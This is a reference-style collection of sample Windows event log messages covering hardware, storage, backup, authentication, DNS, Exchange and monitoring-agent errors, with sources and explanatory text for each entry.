Account Domain: TESTGROUND
Logon ID: 0xbed3f1

Logon Type: 2

This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.


Event ID:
Source:
Microsoft-Windows-Security-Auditing
Category:
Logoff
Message:
User initiated logoff:

Subject:
Security ID: TESTGROUND\cacheduser
Account Name: cacheduser
Account Domain: TESTGROUND
Logon ID: 0xbed3f1

This event is generated when a logoff is initiated but the token reference count is not zero and the logon session cannot be destroyed. No further user-initiated activity can occur. This event can be interpreted as a logoff event.


Event ID:
Source:
Server Administrator
Category:
Instrumentation Service
Message:
Redundancy lost
Redundancy unit: System Board PS Redundancy
Chassis location: Main System Chassis
Previous redundancy state was: Normal


Event ID:
Source:
cpqasm2
Message:
Power supply #1 has failed.


Event ID:
Source:
Server Agents
Category:
Events
Message:
System Information Agent: Health: The Fault Tolerant Power Supply Sub-system is in a failed state. Restore power or replace the failed power supply.
Chassis: '0'; Bay: '1'
[SNMP TRAP: 6050 in CPQHLTH.MIB]


Event ID:
Source:
Server Agents
Category:
Events
Message:
System Information Agent: Health: The Fault Tolerant Power Supply Sub-system has lost redundancy. Restore power or replace any failed or missing power supplies.
Chassis: '0'
[SNMP TRAP: 6032 in CPQHLTH.MIB]


Event ID:
Source:
Server Agents
Category:
Events
Message:
System Information Agent: Health: The Fault Tolerant Power Supply Sub-system has been returned to the OK state.
Chassis: '0'; Bay: '1'
[SNMP TRAP: 6048 in CPQHLTH.MIB]


Event ID:
Source:
Server Agents
Category:
Events
Message:
System Information Agent: Health: The Fault Tolerant Power Supply Sub-system has returned to a redundant state.
Chassis: '0'
[SNMP TRAP: 6054 in CPQHLTH.MIB]


Event ID:
Source:
Trend Micro Security Server
Category:
System
Message:
Threat Alert
OfficeScan detected Cryp_Neb-2 on COMPUTERNAME(user.name) in MyDomain domains.
File: C:\Software\Infected.zip (Infected.exe)
Detection date: 6/17/2009 21:45:17
Action: No action



Event ID:
Source:
ap_notify
Category:
1184 (no category messagefile registered)
Message:
Error (9241), SMTP notification error: smtplib.SMTPException: No suitable authentication method found. (failure)
pid="3756:236"


Event ID:
Source:
LGTO_Sync
Message:
The description for Event ID ( 1 ) in Source ( LGTO_Sync ) cannot be found. The local computer may not have the necessary registry information or message DLL files to display messages from a remote computer. You may be able to use the /AUXSOURCE= flag to retrieve this description; see Help and Support for details. The following information is part of the event: , Sync Stop done.


Event ID:
Source:
Service Control Manager
Message:
The following boot-start or system-start driver(s) failed to load: storflt


Event ID:
Source:
VMSMP
Message:
NIC driver on 'COMPUTER' cannot load because it is incompatible with the server virtualization stack. Server version 2 Client version 1 (VMID D03E098F-B772-4AC4-B434-37527FDEF56A).


Event ID:
Source:
Service Control Manager
Category:
Error
Message:
EVENT # 9697313
EVENT LOG System
EVENT TYPE Error
SOURCE Service Control Manager
EVENT ID 7011
COMPUTERNAME SERVER
DATE / TIME 7/28/2009 8:11:23 PM
MESSAGE Timeout (30000 milliseconds) waiting for a transaction response from the SharedAccess service.


Event ID:
Source:
Application error
Category:
100
Message:
Faulting application wmiprvse.exe, version 5.2.3790.0, faulting module ntdll.dll, version 5.2.3790.0, fault address 0x0002caa2.



Event ID:
Source:
EventSentry
Category:
Service Monitoring
Message:
The status for driver Netaapl (Apple Mobile Device Ethernet Service) changed from Running to Stopped.


Event ID:
Source:
DNS
Message:
The DNS server encountered a packet addressed to itself on IP address xxx.xxx.xxx.xxx. The packet is for the DNS name "au.download.windowsupdate.com.". The packet will be discarded. This condition usually indicates a configuration error.

Check the following areas for possible self-send configuration errors:
1) Forwarders list. (DNS servers should not forward to themselves).
2) Master lists of secondary zones.
3) Notify lists of primary zones.
4) Delegations of subzones. Must not contain NS record for this DNS server unless subzone is also on this server.
5) Root hints.

Example of self-delegation:
-> This DNS server dns1.example.microsoft.com is the primary for the zone example.microsoft.com.
-> The example.microsoft.com zone contains a delegation of bar.example.microsoft.com to dns1.example.microsoft.com,
(bar.example.microsoft.com NS dns1.example.microsoft.com)
-> BUT the bar.example.microsoft.com zone is NOT on this server.

Note, you should make this delegation check (with nslookup or DNS manager) both on this DNS server and on the server(s) you delegated the subzone to. It is possible that the delegation was done correctly, but that the primary DNS for the subzone, has any incorrect NS record pointing back at this server. If this incorrect NS record is cached at this server, then the self-send could result. If found, the subzone DNS server admin should remove the offending NS record.

You can use the DNS server debug logging facility to track down the cause of this problem.


Event ID:
Source:
Windows Server Update Services
Category:
Clients
Message:
Some client computers have not reported back to the server in the last 30 days. 4 have been detected so far.


Event ID:
Source:
EventSentry
Category:
Boot
Message:
The backup file for action "DBMYSQL" has events queued, but the "DBMYSQL" action is currently disabled. The backup file for this action has been backed up to file "C:\Windows\TEMP\eventsentry_backup_f98ff348-8384-4ae8-ae76-6818e4e13765.tmp.backup" and the original file has been deleted.



Event ID:
Source:
Security
Message:
User Account Locked Out


Event ID:
Source:
SQL Server ODBC driver support error
Message:
Unable to load SQL Server ODBC driver resource DLL. The application cannot continue.



Event ID:
Source:
EventSentry
Message:
The number of events cached for action "MSSQL Database", which has been unreachable, exceeded 8192 events. If this action is no longer in use then you should disable or delete the action so that events are no longer cached. EventSentry will continue to cache events until the maximum size of the temporary backup file "C:\WINDOWS\TEMP\eventsentry_backup_xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx..tmp" (32 Mb) is reached. 133952 events are currently cached, the backup file size is 32 Mb.


Event ID:
Source:
McLogEvent
Category:
None
Message:
Would be blocked by port blocking rule (rule is in warn-only mode) (Anti-virus Standard Protection:Prevent mass mailing worms from sending mail).


Event ID:
Source:
System Restore
Message:
Failed to create restore point (Process = C:\Windows\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation; Description = Scheduled Checkpoint; Error = 0x80070422).


Event ID:
Source:
Kerberos
Message:
The kerberos client received a KRB_AP_ERR_MODIFIED error from the server computerA$. The target name used was cifs/computerB.mydomain.local. This indicates that the password used to encrypt the kerberos service ticket is different than that on the target server. Commonly, this is due to identically named machine accounts in the target realm (MYDOMAIN.LOCAL), and the client realm. Please contact your system administrator.


Event ID:
Source:
EventSentry
Category:
Service Monitoring
Message:
The status for driver pssdk41 (PsSdk41) changed from Stopped to Running.

Additional Service Information:

Startup type: Manual
Executable: \??\C:\WINDOWS\system32\Drivers\pssdk41.sys



Event ID:
Source:
Microsoft-Windows-CAPI2
Category:
Application
Message:
Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
Details:
AddCoreCsiFiles : BeginFileEnumeration() failed.
System Error:
Access is denied.
..



Event ID:
Source:
EventSentry
Category:
Heartbeat Monitoring
Message:
The PING status of host <HOSTNAME> remains at ERROR due to error "gethostbyname: The requested name is valid, but no data of the requested type was found. ".


Event ID:
Source:
FrontPage 5.0
Message:
Microsoft FrontPage Server Extensions:
Error #3005f Message: Unable to read configuration for Microsoft Internet Information Server.



Event ID:
Source:
MSExchangeFBPublish
Category:
General
Message:
Unable to prepare message table for polling thread processing on virtual machine WCC-EXCHANGE-4. The error number is 0x80040115. Make sure that the Microsoft Exchange Information Store service is running.


Event ID:
Source:
vmbus
Message:
The parent partition uses a different VMBus version. You need to Install a matching VMBus version in this guest installation.


Event ID:
Source:
storvsp
Message:
A storage device in 'COMPUTERNAME' cannot load because it is incompatible with the server virtualization stack. Server version 2.0 Client version 4.2(VMID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX).


Event ID:
Source:
Server Administrator
Category:
Instrumentation Service
Message:
Log size is near or at capacity
Log type: ESM


Event ID:
Source:
HAL
Category:
System
Message:
The platform firmware has corrupted memory across the previous system power transition. Please check for updated firmware for your system.


Event ID:
Source:
Schannel
Message:
The following fatal alert was generated: 10. The internal error state is 10.

- System

- Provider

[ Name] Schannel
[ Guid] {1F678132-5938-4686-9FDC-C8FF68F15C85}

EventID 36888

Version 0

Level 2

Task 0

Opcode 0

Keywords 0x8000000000000000

- TimeCreated

[ SystemTime] 2009-10-29T14:17:42.310964400Z

EventRecordID 27115

Correlation

- Execution

[ ProcessID] 500
[ ThreadID] 4548

Channel System

Computer OfficePC

- Security

[ UserID] S-1-5-18


- EventData

AlertDesc 10
ErrorState 10



Event ID:
Source:
Windows Backup
Message:
File backup was cancelled by the user.


Event ID:
Source:
Server Agents
Category:
Events
Message:
Remote Insight Agent: The Remote Insight Board/Integrated Lights-Out has detected a controller interface error.
[SNMP TRAP: 9006 in CPQSM2.MIB]


Event ID:
Source:
VDS Basic Provider
Message:
Unexpected failure. Error code: 490@01010004


Event ID:
Source:
EventSentry
Message:
Unable to connect to SMTP host smtp.gmail.com due to error "Timeout.". If you are running McAfee Anti-Virus then make sure that outgoing SMTP traffic is not blocked from this machine (e.g. "Access Protection") and that no firewall is blocking traffic between this host and the mail server.

Unable to connect to SMTP host %1 due to error "%2". If you are running McAfee Anti-Virus then make sure that outgoing SMTP traffic is not blocked from this machine (e.g. "Access Protection") and that no firewall is blocking traffic between this host and the mail server.



Event ID:
Source:
EventSentry
Message:
Error during SMTP communication with SMTP host "192.168.1.48". After sending "." the following error occurred: "[10057] Socket is not connected".

Error during SMTP communication with SMTP host "%1". After sending "%2" the following error occurred: "%3".


Event ID:
Source:
EventSentry
Message:
Unable to connect to SMTP host 192.168.1.48 due to error [10060] Connection timed out. Will try backup smtp host smtp.gmail.com now.

Unable to connect to SMTP host %1 due to error %2. Will try backup smtp host %3 now.


Event ID:
Source:
EventSentry
Message:
Action "Event log to text file" was unable to create/open file "C:\EventSentry\eventsentry_events.txt" due to error: Access is Denied.

Action "%1" was unable to create/open file "%2" due to error: %3


Event ID:
Source:
Srv
Message:
While transmitting or receiving data, the server encountered a network error. Occassional errors are expected, but large amounts of these indicate a possible error in your network configuration. The error status code is contained within the returned data (formatted as Words) and may point you towards the problem.


Event ID:
Source:
Microsoft-Windows-Folder Redirection
Message:
Folder redirection policy application has been delayed until the next logon because the group policy logon optimization is in effect.


Event ID:
Source:
3wareDrv
Message:
AEN: SECTOR_REPAIR (port=1, LBA=0xEFFD80)


Event ID:
Source:
3wareDrv
Message:
AEN: DEGRADED_UNIT (unit=0, port=1)


Event ID:
Source:
EventSentry
Message:
EventSentry determined that the recommended management suite ("OpenManage") from the hardware manufacturer (Dell) is either not installed or not currently running on this server. Without this software, EventSentry will not be able to alert you of critical hardware warnings and/or errors, such as a hard drive failure in a RAID. Please visit the manufacturer's web site to obtain more information and install the recommended management suite.


Additional Information:

Manufacturer: Dell
Model: PowerEdge 1900
Bios Version: 2.2.6


Event ID:
Source:
SideBySide
Message:
Activation context generation failed for "somefile.dll".Error in manifest or policy file "Microsoft.VC90.CRT\Microsoft.VC90.CRT.MANIFEST" on line 4. Component identity found in manifest does not match the identity of the component requested. Reference is Microsoft.VC90.CRT,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b", type="win32", version="9.0.21022.8". Definition is Microsoft.VC90.CRT,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b", type="win32", version="9.0.30729.4148". Please use sxstrace.exe for detailed diagnosis.


Event ID:
Source:
DnsApi
Message:
The system failed to register host (A or AAAA) resource records for network adapter
with settings:

Adapter Name : {D37428FB-D073-4403-87B8-3941F1C3A2B4}
Host Name : MYSERVER
Primary Domain Suffix : mydomain.local
DNS server list :
fec0:0:0:ffff::1, fec0:0:0:ffff::2, fec0:0:0:ffff::3
Sent update to server : <?>
IP Address(es) :
192.168.111.1

Either the DNS server does not support the DNS dynamic update protocol or the authoritative zone for the specified DNS domain name does not accept dynamic updates.

To register the DNS host (A or AAAA) resource records using the specific DNS domain name and IP addresses for this adapter, contact your DNS server or network systems administrator.


Event ID:
Source:
Server Administrator
Category:
Storage Service
Message:
Controller event log: PD missing: SasAddr=0x5000c50001cde56d, ArrayRef=1, RowIndex=0x3, EnclPd=0xff, Slot=5.
: Controller 0 (PERC 5/i Integrated)


Event ID:
Source:
Server Administrator
Category:
Storage Service
Message:
Controller event log: PDs missing from configuration at boot: Controller 0 (PERC 5/i Integrated)


Event ID:
Source:
Server Administrator
Category:
Storage Service
Message:
Controller event log: VDs missing drives and will go offline at boot: 01: Controller 0 (PERC 5/i Integrated)


Event ID:
Source:
Server Administrator
Message:
Controller event log: VD 01/1 is now OFFLINE: Controller 0 (PERC 5/i Integrated)


Event ID:
Source:
Server Administrator
Category:
Storage Service
Message:
Controller event log: PD 04(e0/s4) is not a certified drive: Controller 0 (PERC 5/i Integrated)


Event ID:
Source:
DCOM
Message:
DCOM got error "%2147944122" from the computer xxxxxx when attempting to activate the server:
xxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxxxx


Event ID:
Source:
EventSentry
Message:
Action "MSSQL Database", invoked by feature, "Software Monitoring" was unable to connect to the database due to error "[01000] [Microsoft][ODBC SQL Server Driver][TCP/IP Sockets]ConnectionOpen (Connect()). (11004)". EventSentry will queue events and continue to attempt the delivery of events.



Event ID:
Source:
PlugPlayManager
Message:
The device 'Storage miniport driver' (VMBUS\1481C722-3FBE-4DD2-9468-7D8F1396B27D\1&3189fc23&0&{1481c722-3fbe-4dd2-9468-7d8f1396b27d}) disappeared from the system without first being prepared for removal.


Event ID:
Source:
PlugPlayManager
Message:
The device 'Msft Virtual Disk SCSI Disk Device' (SCSI\Disk&Ven_Msft&Prod_Virtual_Disk\2&240474ae&0&000000) disappeared from the system without first being prepared for removal.


Event ID:
Source:
Windows Backup
Message:
The backup did not complete because of an error writing to the backup location B:\. The error is: The backup location cannot be found or is not valid. Review your backup settings and check the backup location. (0x81000006).


Event ID:
Source:
Perflib
Category:
None
Message:
Windows cannot open the 64-bit extensible counter DLL aspnet_state in a 32-bit environment. Contact the file vendor to obtain a 32-bit version. Alternatively if you are running a 64-bit native environment, you can open the 64-bit extensible counter DLL by using the 64-bit version of Performance Monitor. To use this tool, open the Windows folder, open the System32 folder, and then start Perfmon.exe


Event ID:
Source:
storflt
Message:
The Virtual Storage Filter Driver is disabled through the registry. It is inactive for all disk drives.


Event ID:
Source:
Microsoft-Windows-Security-Auditing
Category:
System Integrity
Message:
Code Integrity determined that the page hashes of an image file are not valid. The file could be improperly signed without page hashes or corrupt due to unauthorized modification. The invalid hashes could indicate a potential disk device error.

File Name: \Device\HarddiskVolume2\Windows\System32\l3codeca.acm


Event ID:
Source:
Server Administrator
Category:
Instrumentation Service
Message:
Log size is full
Log type: ESM



Event ID:
Source:
MsiInstaller
Message:
Product: Adobe Reader 9.3 - Update '{AC76BA86-7AD7-0000-2550-7A8C40000934}' could not be installed. Error code 1625. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft.com/fwlink/?LinkId=23127


Event ID:
Source:
VMSMP
Message:
Networking driver on 'VMCOMPUTERNAME' loaded but has a different version from the server. Server version 3.2 Client version 0.2 (Virtual machine ID 041A17DA-19CF-4667-9253-48DBA40CB726). The device will work, but this is an unsupported configuration. This means that technical support will not be provided until this problem is resolved. To fix this problem, upgrade the integration services. To upgrade, connect to the virtual machine and select Insert Integration Services Setup Disk from the Action menu.


Event ID:
Source:
3wareDrv
Message:
AEN: APORT_TIMEOUT_DETECTED (port=0)


Event ID:
Source:
service control manager
Message:
The Debug Diagnostic service entered the running state


Event ID:
Source:
MSExchangeIS
Category:
Exchange VSS Writer
Message:
Exchange VSS Writer (instance 6c1b73a7-5922-480e-a8ef-f89e3b34780a:20) has unsuccessfully completed the backup of storage group 'First Storage Group'. No log files have been truncated for this storage group.


Event ID:
Source:
Microsoft-Windows-Backup
Category:
Application
Message:
%%2147942405


Event ID:
Source:
Microsoft-Windows-Eventlog
Message:
The security log is now full.


Event ID:
Source:
Microsoft-Windows-Eventlog
Message:
Event log automatic backup
Log: Security
File: C:\Windows\System32\Winevt\Logs\Archive-Security-2010-11-05-11-20-26-007.evtx



Event ID:
Source:
Perflib
Category:
none
Message:
The configuration information of the performance library "C:\WINDOWS\system32\perfts.dll" for the "TermService" service does not match the trusted performance library information stored in the registry. The functions in this library will not be treated as trusted.



Event ID:
Source:
Application Hang
Category:
101
Message:
Hanging application Customer.exe, version 6.0.16.0, hang module hungapp, version 0.0.0.0, hang address 0x00000000.



Event ID:
Source:
service control manager
Category:
none
Message:
The Distributed Transaction Coordinator service terminated with service-specific error 3221229584 (0xC0001010).


Event ID:
Source:
userenv
Category:
none
Message:
Windows cannot determine the associated site for this computer. (The RPC server is too busy to complete this operation. ). Group Policy processing aborted.


Event ID:
Source:
application error
Category:
100
Message:
Faulting application Ppcl.exe, version 8.1.660.0, faulting module ntdll.dll, version 5.2.3790.4455, fault address 0x0002860e.


Event ID:
Source:
System Information Agent: Health: The Fault Tolerant Power Supply Sub-system
Message:
System Information Agent: Health: The Fault Tolerant Power Supply Sub-system has lost redundancy. Restore power or replace any failed or missing power supplies.
Chassis: '0'
[SNMP TRAP: 6032 in CPQHLTH.MIB]
Detected by application: Server Agents


Event ID:
Source:
System Information Agent: Health: The Fault Tolerant Power Supply Sub-system
Message:
System Information Agent: Health: The Fault Tolerant Power Supply Sub-system is in a failed state. Restore power or replace the failed power supply.
Chassis: '0'; Bay: '2'
[SNMP TRAP: 6050 in CPQHLTH.MIB]
Detected by application: Server Agents


Event ID:
Source:
MetaFrameEvents
Category:
Printer Management
Message:
Client printer auto-creation failed. The driver could not be installed. Possible reasons for the failure: The driver is not in the list of drivers on the server. The driver cannot be located. Driver mapping is incorrect. Client name: (WI_0NZOY79v2OfWLkfXH) Printer: (FBC-HR-3700 on ps_1 (from WI_0NZOY79v2OfWLkfXH) in session 4) Client Printer driver: (HP COLOR LASERJET 3700 PCL 6) Server Printer driver: (HP Color LaserJet 3700 PCL 6)


Event ID:
Source:
NVRAIDSERVICE
Message:
Access failure: Critical error on disk XXXXXXX (Port: SATA 2.0).


Event ID:
Source:
nvrdx64
Message:
Error message from one of the disks failing on an onboard nVidia nForce4 RAID controller.


Event ID:
Source:
NVRAIDSERVICE
Message:
Error message from one of the disks failing on an onboard nVidia nForce4 RAID controller.


Event ID:
Source:
MSExchangeSA
Category:
Monitoring
Message:
The MAD Monitoring thread was unable to read the state of the services, error '0x80010108'.

For more information, click http://www.microsoft.com/contentredirect.asp.


Event ID:
Source:
Service Control Manager
Message:
________________________________________
EVENT # 170686
EVENT LOG System
EVENT TYPE Error
SOURCE Service Control Manager
EVENT ID 7034
COMPUTERNAME HDQ121
DATE / TIME 3/8/2011 3:29:02 PM
MESSAGE The McAfee Engine Service service terminated unexpectedly. It has done this 2 time(s).
________________________________________

Find out more about the event at http://www.myeventlog.com.


Event ID:
Source:
NSTSEC
Category:
1
Message:
The description for Event ID ( 256 ) in Source ( NSTSEC ) cannot be found. The local computer may not have the necessary registry information or message DLL files to display messages from a remote computer. You may be able to use the /AUXSOURCE= flag to retrieve this description; see Help and Support for details. The following information is part of the event: [**NST**][PID:864;TID:960][CNSTCSPHelper is initializing!][FUNC=NSTSECProxy::NSTSECProxy::CNSTCSPHelper::Initialize][FILE=.\NSTCSPClient.cpp:LINE=36]



Event ID:
Source:
MSExchange ActiveSync
Category:
Configuration
Message:
The setting ExternalProxy in the Web.Config file was not valid. The previous value was null and has been changed to .


Event ID:
Source:
DCOM
Category:
None
Message:
The server {8C53F4F9-90F5-4CA0-A8FE-76ECF5FBD2CF} did not register with DCOM within the required timeout.


Event ID:
Source:
SQLBrowser
Category:
None
Message:
The configuration of the AdminConnection\TCP protocol in the SQL instance BLACKBERRY is not valid.


Event ID:
Source:
VSS
Message:
Volume Shadow Copy Service error: Failed resolving account ACCOUNTNAME with status 1376. Check connection to domain controller and VssAccessControl registry key.
Operation:
Gather writers' status
Executing Asynchronous Operation
Context:
Current State: GatherWriterStatus
Error-specific details:
Error: NetLocalGroupGetMemebers(ACCOUNTNAME), 0x80070560, The specified local group does not exist.



Event ID:
Source:
SBCore
Message:
This computer must be configured as a domain controller. To prevent this computer from shutting down in the future, run Setup on the disk that you used to install the operating system to configure the computer as a domain controller.


Event ID:
Source:
WinMgmt
Message:
A provider, TPVCGProv, has been registered in the WMI namespace, Root\ThinPrint, but did not specify the HostingModel property. This provider will be run using the LocalSystem account. This account is privileged and the provider may cause a security violation if it does not correctly impersonate user requests. Ensure that provider has been reviewed for security behavior and update the HostingModel property of the provider registration to an account with the least privileges possible for the required functionality.


Event ID:
Source:
NTBackup
Message:
NTBackup error: 'The operation failed. Consult the Backup Report for more details.'


Event ID:
Source:
Microsoft-Windows-RPC-Events
Message:
Possible Memory Leak. Application ("C:\Windows\system32\mmc.exe" "C:\Windows\system32\dhcpmgmt.msc" ) (PID: 6320) has passed a non-NULL pointer to RPC for an [out] parameter marked [allocate(all_nodes)]. [allocate(all_nodes)] parameters are always reallocated; if the original pointer contained the address of valid memory, that memory will be leaked. The call originated on the interface with UUID ({6BFFD098-A112-3610-9833-46C3F874532D}), Method number (2). User Action: Contact your application vendor for an updated version of the application.


Event ID:
Source:
Microsoft-Windows-WindowsUpdateClient
Category:
Windows Update Agent
Message:
Installation Failure: Windows failed to install the following update with error 0x80070643: Security Update for SQL Server 2008 R2 (KB2494088).


Event ID:
Source:
Security
Category:
Logon/Logoff
Message:
Logon Failure:
Reason: Unknown user name or bad password
User Name: FIRST LAST
Domain: USER-PC
Logon Type: 3
Logon Process: NtLmSsp
Authentication Package: NTLM
Workstation Name: USER-PC
Caller User Name: -
Caller Domain: -
Caller Logon ID: -
Caller Process ID: -
Transited Services: -
Source Network Address: 0.0.0.0
Source Port: 0



Event ID:
Source:
3wareDrv
Category:
None
Message:
FW: AEN 0x10D:


Event ID:
Source:
Microsoft-SharePoint Products-SharePoint Foundation Search
Category:
Gatherer
Message:
The mount operation for the gatherer application 00000000-0000-0000-0000-000000000000 has failed because the schema version of the search administration database is less than the minimum backwards compatibility schema version supported for this gatherer application. The database might not have been upgraded.


Event ID:
Source:
dmvsc
Message:
The Dynamic Memory driver failed because dynamic memory is not supported on this release of Windows.


Event ID:
Source:
q57w2k
Message:
HP NC7781 Gigabit Server Adapter: The network link is down. Check to make sure the network cable is properly connected.


Event ID:
Source:
ESE
Message:
Information Store
2140
12



Event ID:
Source:
Schannel
Message:
The SSL server credential's certificate does not have a private key information property attached to it. This most often occurs when a certificate is backed up incorrectly and then later restored. This message can also indicate a certificate enrollment failure.


Event ID:
Source:
Microsoft-Windows-Security-Auditing
Category:
Other Policy Change Events
Message:
One or more errors occured while processing security policy in the group policy objects.

Error Code: 87
GPO List:
{F0DF8E32-7E0A-4B67-1234-9BD831BFE64C} Windows Audit & Event Log Settings
{AAC1786C-016F-11D2-9012-00C04fB984F9} Default Domain Controllers Policy
{91B2F340-016D-11D2-1234-00C04FB984F9} Default Domain Policy



Event ID:
Source:
Security
Category:
System Event
Message:
The system time was changed.
Process ID: 1296
Process Name: C:\WINDOWS\system32\EVENTSENTRY\eventsentry_svc.exe
Primary User Name: WEBSERVER$
Primary Domain: MYDOMAIN
Primary Logon ID: (0x0,0x3E7)
Client User Name: WEBSERVER$
Client Domain: MYDOMAIN
Client Logon ID: (0x0,0x3E7)
Previous Time: 8:57:01 PM 8/31/2011
New Time: 8:57:06 PM 8/31/2011


Event ID:
Source:
Microsoft-Windows-CAPI2
Message:
Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.


Event ID:
Source:
Microsoft-Windows-Resource-Exhaustion-Detector
Category:
Resource Exhaustion Diagnosis Events
Message:
Windows successfully diagnosed a low virtual memory condition. The following programs consumed the most virtual memory: SomeProcess.exe (848) consumed 372129792 bytes, Procmon64.exe (3616) consumed 209563648 bytes, and devenv.exe (6364) consumed 201162752 bytes.


Event ID:
Source:
MSSQLSERVER
Category:
Server
Message:
Server is listening on [ 'any' <ipv4> 1433]


Event ID:
Source:
Security
Category:
Policy Change
Message:
System Security Access Granted:
Access Granted: SeBatchLogonRight
Account Modified: DOMAINA\username
Assigned By:
User Name: SERVERNAME$
Domain: DOMAINA
Logon ID: (0x0,0x3E7)



Event ID:
Source:
Server Administrator
Category:
Storage Service
Message:
Controller log file entry: Physical Disk 1:0:4 Controller 0, Connector 1


Event ID:
Source:
Server Administrator
Category:
Storage Service
Message:
Unexpected sense. SCSI sense data: Sense key: 3 Sense code: 11 Sense qualifier: 0: Physical Disk 1:0:4 Controller 0, Connector 1


Event ID:
Source:
Userenv
Message:
Windows cannot perform filter check for Group Policy object CN={<GUID>}CN=PoliciesCN=SystemDC=DOMAINDC=local. Group Policy processing aborted.


Event ID:
Source:
cpqasm2
Message:
The power sub-system is no longer redundant.


Event ID:
Source:
HP Sensor
Category:
System Power
Message:
A power supply has failed. (Power Supply 1)

User Action
Check the failed power supply and replace if necessary.

WBEM Indication Properties
AlertingElementFormat: 2 0x2 (CIMObjectPath)



Event ID:
Source:
HP Sensor
Category:
System Power
Message:
Power redundancy has been lost. (Power Redundancy Set 1)

User Action
Check the power supply configuration and check the status of the power redundancy. Ensure the system is being powered adequately. Add or replace power supplies if necessary.

WBEM Indication Properties
AlertingElementFormat: 2 0x2 (CIMObjectPath)


Event ID:
Source:
Windows Backup
Message:
The backup was not successful. The error is: There is not enough space on this drive to save the backup. Free up space by deleting older backups and unnecessary data or change your backup settings. (0x81000005).


Event ID:
Source:
Server Administrator
Category:
Storage Service
Message:
The RAID controller firmware and driver validation was not performed. The configuration file is out of date or corrupted. C:\Program Files (x86)\Dell\SysMgt\sm\cfg\: Controller 0 (SAS 6/iR Integrated)


Event ID:
Source:
Schannel
Category:
System
Message:
The following fatal alert was received: 46


Event ID:
Source:
Server Agents
Category:
System
Message:
System Information Agent: Health: Fault Tolerant Power Supply Removed. A hot-plug fault tolerant power supply has been removed from the system.
Chassis: '0'; Bay: '2'
[SNMP TRAP: 6034 in CPQHLTH.MIB]


Event ID:
Source:
USER32
Category:
NONE
Message:
The attempt to power off [Computer Name] failed



Event ID:
Source:
Service Control Manager
Message:
The start type of the Windows Modules Installer service was changed from auto start to demand start.


Event ID:
Source:
PostgreSQL
Message:
ERROR: permission denied for relation SomeTable STATEMENT: select COLUMN1 from SomeTable where COLUMN2=5


Event ID:
Source:
Microsoft-Windows-Security-Auditing
Category:
MPSSVC Rule-Level Policy Change
Message:
Windows Firewall ignored a rule because its major version number is not recognized.

Profile: All

Ignored Rule:
ID: clr_optimization_v4.0.30319_32-1
Name: -


Event ID:
Source:
EventSentry
Category:
Service Monitoring
Message:
A driver was added:

Name: mraid35x (Mraid35x)
Status: Stopped
Startup type: Automatic
Executable: \SystemRoot\system32\drivers\mraid35x.sys


Event ID:
Source:
EventSentry
Message:
The ODBC driver for action "24hour" in the EventSentry Agent has been automatically adjusted to use "SQL Server Native Client 10.0", which is the latest version installed on this system. Dynamically added connection options: MARS_Connection=yes.



Event ID:
Source:
hpdiags
Message:
The description for Event ID ( 105 ) in Source ( hpdiags ) cannot be found. The local computer may not have the necessary registry information or message DLL files to display messages from a remote computer. You may be able to use the /AUXSOURCE= flag to retrieve this description; see Help and Support for details.


Event ID:
Source:
EventSentry Network Services
Category:
Snmp Trap
Message:
A SNMP trap was received:

Version: 1
Community: public
Trap Sender: vmware1.domain.local (192.168.12.55)
Trap ID: vmware.vmwProductSpecific.vmwESX.vmkLoaded (1.3.6.1.4.1.6876.4.1.6.1)

Trap Bindings:
1: vmware.vmwTraps.vmwVmID (1.3.6.1.4.1.6876.50.101) = 1
2: vmware.vmwTraps.vmwVmConfigFilePath (1.3.6.1.4.1.6876.50.102) = /vmfs/volumes/474c55f6-89ccc558-5555-001143ebb975/TestServerF/TestServerF.vmx
3: vmware.vmwVirtMachines.vmwVmTable.vmwVmEntry.vmwVmDisplayName.1 (1.3.6.1.4.1.6876.2.1.1.2.1) = TEST07-W2K3-DE


Event ID:
Source:
EventSentry Network Services
Category:
Snmp Trap
Message:
A SNMP trap was received:

Version: 3
Username: public
Trap Sender: ups41.domain.local (192.168.16.117)
Trap ID: apc (1.3.6.1.4.1.318.0.10)
Engine ID: 0x800000000300C0B74DD7A6
Security Level: Authentication and Privacy

Trap Bindings:
1: apc.apcmgmt.mtrapargs.mtrapargsString (1.3.6.1.4.1.318.2.3.3.0) = UPS: Passed a self-test.



Event ID:
Source:
EventSentry Network Services
Category:
Syslog
Message:
syslog@vmserver5.domain.local[daemon.warning]: Server Administrator: Storage Service EventID: 2264 A device is missing.: Battery 0 Controller 0


Event ID:
Source:
Security
Category:
System Event
Message:
Unable to log events to security log:
Status code: 0xc0000008
Value of CrashOnAuditFail: 0
Number of failed audits: 103


Event ID:
Source:
EventSentry
Category:
Performance Monitoring
Message:
The EventSentry agent is experiencing an unusually high handle count (5001 handles) and/or high memory usage (48324564 bytes), which is most likely due to a known issue in Windows Server 2003 SP2 (http://support.microsoft.com/kb/938135). It is highly recommended that you navigate to http://support.microsoft.com/kb/938135 to download and install the hotfix to resolve this issue. It is not recommended that you continue to run the agent for an extended time period without installing the Microsoft hotfix.

Failure to install the hotfix may eventually result in system instability or a system crash. Installation of the hotfix will require a reboot.


Event ID:
Source:
AtBroker
Message:
GetSessionValue Failed to Open session value return error 2


Event ID:
Source:
Microsoft-Windows-Service Pack Installer
Message:
There is not enough free disk space to install the Service Pack. Required=4834 MB.


Event ID:
Source:
MSExchange CmdletLogs
Category:
General
Message:
Cmdlet suceeded. Cmdlet New-Mailbox, parameters {Name=Johnny Test User, UserPrincipalName=johnnytest@domain.local, ResetPasswordOnNextLogon=False, FirstName=Johnny, Initials=, Password=System.Security.SecureString, LastName=Test, Alias=johnnytest, SamAccountName=johnnytest}.


Event ID:
Source:
Microsoft-Windows-Servicing
Message:
Windows Servicing failed to complete the process of setting package KB967723 (Security Update) into Installed(Installed) state


Event ID:
Source:
EventSentry
Message:
